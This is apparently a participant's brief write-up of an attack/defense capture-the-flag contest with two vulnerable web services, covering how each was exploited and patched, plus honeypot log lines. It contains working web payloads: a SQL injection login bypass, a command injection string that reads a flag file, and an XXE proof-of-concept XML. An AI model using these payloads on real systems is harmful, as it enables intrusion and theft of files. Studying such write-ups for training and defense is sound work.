# wu

* I wasn't sure if **we were** allowed to do wu, but I wrote a **brief summary** for my own records.

### tldr;

**attack / defense ctf** where you were given 2 web services to defend and attack other teams' instances:

#### 🌟 **Mercury Service** (Port 8080)

* **original**: <mark style="color:$warning;">vuln.py</mark> - login endpoint, flag is in <mark style="color:$danger;">`/home/rta_service/flag.txt`</mark>
  * **vulnerability**: sqli bypass + command injection via <mark style="color:$danger;">`/ping`</mark>
  * **exploit**:
    * sqli login with <mark style="color:$danger;">`admin' OR '1'='1`</mark> → authenticated and then ping with command injection, &#x20;
    * targets <mark style="color:$danger;">`/ping?host=127.0.0.1;cat /home/rta_service/flag.txt`</mark>&#x20;
* **patched**: added session management, input validation, honeypot traps

#### 🌟 **Mars Service** (Port 8080)

* **original**: <mark style="color:$warning;">app.py</mark> - Unsafe xml parser with <mark style="color:$danger;">`resolve_entities=True`</mark>
  * **vulnerability**: xxe (xml External Entity) injection via file upload
  * **exploit**: upload malicious xml to read sensitive files
  * ```xml
    poc.xml
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE root [
      <!ENTITY xxe SYSTEM "file:///home/rta_service/flag.txt">
    ]>
    <root>
      <item>&xxe;</item>
    </root>
    ```
* **patched**: disabled external entities, added input validation

### please dont do this at home.

leave a honeypot and a fake flag up since I know they are automate to hit my services. Now I have a bunch of ips 🥀, please use vpn

{% code overflow="wrap" %}

```
...
[2025-09-28 03:00:07] ip=[REDACTED] event=HONEYPOT_HIT details=reason=doctype/entity detected
[2025-09-28 03:00:16] ip=[REDACTED] event=HONEYPOT_HIT details=reason=doctype/entity detected
[2025-09-28 03:00:18] ip=[REDACTED] event=HONEYPOT_HIT details=reason=doctype/entity detected
...
```

{% endcode %}